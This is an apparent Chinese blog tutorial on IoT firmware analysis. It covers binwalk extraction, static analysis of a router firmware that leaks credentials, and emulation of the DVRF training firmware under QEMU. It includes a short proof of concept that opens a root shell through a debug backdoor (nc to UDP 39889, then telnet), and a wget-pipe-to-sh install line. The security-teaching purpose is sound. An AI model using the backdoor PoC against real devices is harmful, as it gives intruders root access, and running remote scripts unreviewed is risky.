

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/tab-about/red_bear.jpg">
  <link rel="icon" href="/img/tab-about/red_bear.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="k3ppf0r">
  <meta name="keywords" content="IOT, QEMU,  ">
  
    <meta name="description" content="包含完整IOT渗透测试流程，供参考">
<meta property="og:type" content="article">
<meta property="og:title" content="IOT 固件分析入门">
<meta property="og:url" content="https://k3ppf0r.github.io/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/index.html">
<meta property="og:site_name" content="k3ppf0r&#39;s blog">
<meta property="og:description" content="包含完整IOT渗透测试流程，供参考">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://k3ppf0r.github.io/img/post-IOT/iot.jpg">
<meta property="article:published_time" content="2022-12-20T04:00:00.000Z">
<meta property="article:modified_time" content="2022-12-21T04:00:00.000Z">
<meta property="article:author" content="k3ppf0r">
<meta property="article:tag" content="IOT安全">
<meta property="article:tag" content="QEMU">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://k3ppf0r.github.io/img/post-IOT/iot.jpg">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>IOT 固件分析入门 - k3ppf0r&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"k3ppf0r.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null},"gtag":null,"woyaola":null,"cnzz":null},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>k3ppf0r&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/page-default/post.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="IOT 固件分析入门"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-12-20 12:00" pubdate>
          2022年12月20日 中午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.2k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          36 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        

      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">IOT 固件分析入门</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2022年12月21日 中午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="01-提取-IoT-固件"><a href="#01-提取-IoT-固件" class="headerlink" title="01-提取 IoT 固件"></a>01-提取 IoT 固件</h1><p>首先我们需要安装固件提取工具 binwalk，由于该工具的安装流程比较繁琐，建议直接使用 Kali Linux，该系统默认安装有 binwalk。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/ReFirmLabs/</span>binwalk<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/01/1.png" srcset="/img/loading.gif" lazyload alt="1"></p>
<p>提取固件系统的参数是-e，我们可以加上-t -vv 参数查看详细的提取过程。通过输出信息，可以得知该固件系统没有加密压缩，且系统为 Squashfs。</p>
<figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dns">binwalk -t -vv -e RT-N<span class="hljs-number">300_3.0</span>.<span class="hljs-number">0</span>.<span class="hljs-number">4</span>_<span class="hljs-number">378_9317</span>-g2f672ff.trx<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/01/2.png" srcset="/img/loading.gif" lazyload alt="2"></p>
<p>提取出来的文件夹为_RT-N300_3.0.0.4_378_9317-g2f672ff.trx.extracted，其中的 squashfs-root 就是我们想要的该固件的文件系统。<br><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/01/3.png" srcset="/img/loading.gif" lazyload alt="3"></p>
<p>那么 binwalk 的是怎么实现提取的呢？原理就是，通过自带的强大的 magic 特征集，扫描固件中文件系统初始地址的特征码，若匹配成功，则将该段数据 dump 下来，这个 magic 特征集已公开。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/ReFirmLabs/</span>binwalk<span class="hljs-regexp">/blob/</span><span class="hljs-number">62</span>e9caa164305a18d7d1f037ab27d14ac933d3cf<span class="hljs-regexp">/src/</span>binwalk<span class="hljs-regexp">/magic/</span>filesystems<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/01/4.png" srcset="/img/loading.gif" lazyload alt="4"></p>
<p>以这个固件为例，是 Squashfs 文件系统，对应的扫描特征码为 hsqs。<br><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/01/5.png" srcset="/img/loading.gif" lazyload alt="5"></p>
<p>我们可以做个实验，使用 hexdump 搜索 hsqs 的地址，为 0xe20c0，这个就是文件系统的初始地址。</p>
<figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dns">hexdump -C RT-N<span class="hljs-number">300_3.0</span>.<span class="hljs-number">0</span>.<span class="hljs-number">4</span>_<span class="hljs-number">378_9317</span>-g2f672ff.trx | grep -i &#x27;hsqs&#x27;<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/01/6.png" srcset="/img/loading.gif" lazyload alt="6"></p>
<p>使用 dd 命令截取地址 925888（0xe20c0）之后的数据，保存到 rt-n300-fs。</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">dd <span class="hljs-attribute">if</span>=RT-N300_3.0.0.4_378_9317-g2f672ff.trx <span class="hljs-attribute">bs</span>=1 <span class="hljs-attribute">skip</span>=925888 <span class="hljs-attribute">of</span>=rt-n300-fs<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/01/7.png" srcset="/img/loading.gif" lazyload alt="7"></p>
<p>最后，使用 unsquashfs rt-n300-fs 命令解析 rt-n300-fs 文件，得到的 squashfs-root 就是固件系统，这个跟上述 binwalk 提取的那个是一样的。</p>
<figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dos">unsquashfs rt-n300-<span class="hljs-built_in">fs</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/01/8.png" srcset="/img/loading.gif" lazyload alt="8"></p>
<h1 id="02-静态分析-IoT-固件"><a href="#02-静态分析-IoT-固件" class="headerlink" title="02 静态分析 IoT 固件"></a>02 静态分析 IoT 固件</h1><p>得到固件后，若直接打开，会发现该固件被加了密，无法直接解压缩，这是厂商对该固件做了保护，防止大家逆向分析他的固件。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/02-%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/1.png" srcset="/img/loading.gif" lazyload alt="1"></p>
<p>通过 frackzip 工具可以破解该 zip 的密码，时间要挺久的，我直接告诉你吧，密码是 beUT9Z。<br><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/02-%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/2.png" srcset="/img/loading.gif" lazyload alt="2"></p>
<p>解压后发现文件夹中有多个.yaffs2 后缀的文件，这些都是固件的文件。<br><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/02-%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/3.png" srcset="/img/loading.gif" lazyload alt="3"></p>
<p>yaffs2 里有几个看上去是 recovery 的镜像，核心的应该是 2K-mdm-image-mdm9625.yaffs2 ，我们下面就来提取该文件，我首先用 binwalk 来提取它，但提取出来的文件乱七八糟，不知道什么原因，后来看网上推荐直接用 yaffs 的原生工具 unyaffs 提取，就可以了，文件系统清晰明了。</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">unyaffs</span> <span class="hljs-number">2</span>K-mdm-image-mdm9625.yaffs2 yaffs2-root/<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/02-%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/4.png" srcset="/img/loading.gif" lazyload alt="4"></p>
<p>接下来我们查找该路径下的所有.conf 文件，.conf 文件多是配置文件，有可能从中可以发现敏感的信息。</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">find</span> . -name <span class="hljs-string">&#x27;*.conf&#x27;</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/02-%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/5.png" srcset="/img/loading.gif" lazyload alt="5"></p>
<p>其中的 inadyn-mt.conf 文件引起了我们注意，这是 no-ip 应用的配置文件，no-ip 就是一个相当于花生壳的东西，可以申请动态域名。我们从中可以发现泄露的 no-ip 的登陆账号及密码。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cat</span> etc/inadyn-mt.conf<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/02-%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/6.png" srcset="/img/loading.gif" lazyload alt="6"></p>
<p>除了上述泄露的 no-ip 账号密码，我们还从 shadow 文件中找到了 root 账号的密码，通过爆破可以得到 root 的密码为 1234。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cat</span> ~/yaffs2-root/etc/shadow<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/02-%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/7.png" srcset="/img/loading.gif" lazyload alt="7"></p>
<p>其实并不止有.conf 文件会泄露信息，还有很多其他后缀的敏感文件会泄露信息，我们接下来使用 firmwalker 工具来自动化遍历该固件系统中的所有可疑文件。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">git <span class="hljs-built_in">clone</span> https://github.com/craigz28/firmwalker.git<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/02-%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/8.png" srcset="/img/loading.gif" lazyload alt="8"></p>
<p>命令如下，firmwalker 会将结果保存到 firmwalker.txt。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">./firmwalker.sh ~/yaffs2-root/<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/02-%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/9.png" srcset="/img/loading.gif" lazyload alt="9"></p>
<p>看了下该工具的源码，没啥亮点，就是遍历各种后缀的文件。<br><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/02-%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/10.png" srcset="/img/loading.gif" lazyload alt="10"></p>
<p>后缀都在 data 文件夹中的各个配置文件中。<br><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/02-%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/11.png" srcset="/img/loading.gif" lazyload alt="11"></p>
<p>分析完敏感的配置文件后，我们接下来分析存在风险的二进制程序。查看自启动的程序，一个 start_appmgr 脚本引起了我们注意，mgr 一般就是主控程序的意思。<br><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/02-%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/12.png" srcset="/img/loading.gif" lazyload alt="12"></p>
<p>该脚本会在开机的时候以服务的形式运行&#x2F;bin.appmgr 程序。<br><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/02-%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/13.png" srcset="/img/loading.gif" lazyload alt="13"></p>
<p>通过 IDA 进行反编译，在 main 函数中发现了一个管理员当时为了方便调试留下的后门，只要连接该固件的 39889 端口并发送 HELODBG 的字符串，就可以进行远程执行命令。<br><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/02-%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/14.png" srcset="/img/loading.gif" lazyload alt="14"></p>
<p>POC 如下：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs awk">user@kali:~$ echo -ne <span class="hljs-string">&quot;HELODBG&quot;</span> | nc -u <span class="hljs-number">192.168</span>.<span class="hljs-number">1.1</span> <span class="hljs-number">39889</span><br>Hello<br>^C<br>user@kali:~$ telnet <span class="hljs-number">192.168</span>.<span class="hljs-number">1.1</span><br>Trying <span class="hljs-number">192.168</span>.<span class="hljs-number">1.1</span>...<br>Connected to <span class="hljs-number">192.168</span>.<span class="hljs-number">1.1</span>. Escape character is <span class="hljs-string">&#x27;^]&#x27;</span>.  <br>OpenEmbedded Linux homerouter.cpe    <br>msm <span class="hljs-number">20141210</span> homerouter.cpe  <br>/ <span class="hljs-comment"># </span><br>id uid=<span class="hljs-number">0</span>(root) gid=<span class="hljs-number">0</span>(root)<br>/ <span class="hljs-comment"># </span><br><span class="hljs-keyword">exit</span><br>Connection closed by foreign host.<br>user@kali:~$<br></code></pre></td></tr></table></figure>

<p>除了以上这些，该固件还存在多个漏洞，详细的报告可以参考：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">https:<span class="hljs-regexp">//</span>www.anquanke.com<span class="hljs-regexp">/post/i</span>d/<span class="hljs-number">84671</span><br></code></pre></td></tr></table></figure>

<h1 id="03-动态分析-IoT-固件"><a href="#03-动态分析-IoT-固件" class="headerlink" title="03 动态分析 IoT 固件"></a>03 动态分析 IoT 固件</h1><p>动态分析固件之前，需要先把固件运行起来，但我们手头又没有路由器、摄像头之类的物联网硬件，该如何运行呢？这就需要虚拟执行，虚拟执行你就把它想象成一个虚拟机可以运行各种物联网 OS 就是了。虚拟执行 IoT 固件需要用到 firmadyne 工具，该工具很难安装，在 kali 上安装一直报错，你们可以尝试下，反正我是放弃了，最终还是乖乖地用 attifyti 提供的物联网渗透专用虚拟机，下载下来的文件直接用 vmware 导入就行了。<br><a target="_blank" rel="noopener" href="https://www.dropbox.com/sh/xrfzyp1ex2uii53/AAAF0mdA1qFaEBDYZoIxaQRma?dl=0">https://www.dropbox.com/sh/xrfzyp1ex2uii53/AAAF0mdA1qFaEBDYZoIxaQRma?dl=0</a><br><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/1.png" srcset="/img/loading.gif" lazyload alt="1"></p>
<p>该系统为 ubuntu14，密码为 password@123，下面我们来演示虚拟执行一个 dlink 固件。<br><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/2.png" srcset="/img/loading.gif" lazyload alt="2"></p>
<p>在 tools&#x2F;fat 路径下运行 fat.py，输入固件路径 DWP2360b-firmware-v206-rc018.bin，然后是固件的品牌 dlink，依次输入数据库密码 firmadyne 和用户密码 password@123。</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs vim"><span class="hljs-keyword">python</span> fat.<span class="hljs-keyword">py</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/3.png" srcset="/img/loading.gif" lazyload alt="3"></p>
<p>脚本执行成功后，会回显一个 IP 地址，这个 IP 就是模拟的固件地址。<br><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/4.png" srcset="/img/loading.gif" lazyload alt="4"></p>
<p>以上只是简单地演示如何虚拟执行一个固件，下面我们就来实操如何通过动态调试分析一个固件，接下来的固件采用 DVRF，这是个网友自制的充满漏洞的固件，供学习用的。</p>
<figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">git <span class="hljs-keyword">clone</span> <span class="hljs-title">https</span>://github.com/praetorian-code/DVRF.git<br></code></pre></td></tr></table></figure>

<p>开始之前，安装以下工具，动态调试中会用到。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">sudo apt install gdb-multiarch<br>wget -q -O- https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/hugsy/g</span>ef<span class="hljs-regexp">/raw/m</span>aster<span class="hljs-regexp">/scripts/g</span>ef.sh | sh<br>sudo pip3 install capstone unicorn keystone-engine<br></code></pre></td></tr></table></figure>

<p>安装 keystone-engine 时可能会报错，参考这个链接。<br><a target="_blank" rel="noopener" href="https://github.com/avatartwo/avatar2/issues/23">https://github.com/avatartwo/avatar2/issues/23</a></p>
<p>安装好工具后，就开始对固件进行分析啦，固件路径如下。<br>DVRF&#x2F;Firmware&#x2F;DVRF_v03.bin<br>使用 binwalk 提取固件文件系统。</p>
<figure class="highlight excel"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs excel">binwalk -<span class="hljs-built_in">t</span> -e DVRF_v03.bin<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/5.png" srcset="/img/loading.gif" lazyload alt="5"></p>
<p>提取出来的系统有个文件夹 pwnable，这个文件夹就是存放着有漏洞的程序示例，我们选取缓冲区漏洞程序 stack_bof_01 进行实验。首先使用 readelf 命令查看该程序的架构。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">readelf -h pwnable<span class="hljs-regexp">/Intro/</span>stack_bof_01<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/6.png" srcset="/img/loading.gif" lazyload alt="6"></p>
<p>拷贝 qemu-mipsel-static 到当前目录，然后配合 chroot 虚拟执行 stack_bof_01 固件，可以成功执行。qemu 是一款轻型的虚拟机。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cp</span> $(<span class="hljs-built_in">which</span> qemu-mipsel-static) .<br><span class="hljs-built_in">sudo</span> <span class="hljs-built_in">chroot</span> . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/7.png" srcset="/img/loading.gif" lazyload alt="7"></p>
<p>查看 stack_bof_01 的源码，可以发现明显的 strcpy 内存溢出漏洞，当参数 argv[1]超过 200 时，就会出现 buf 溢出的现象。</p>
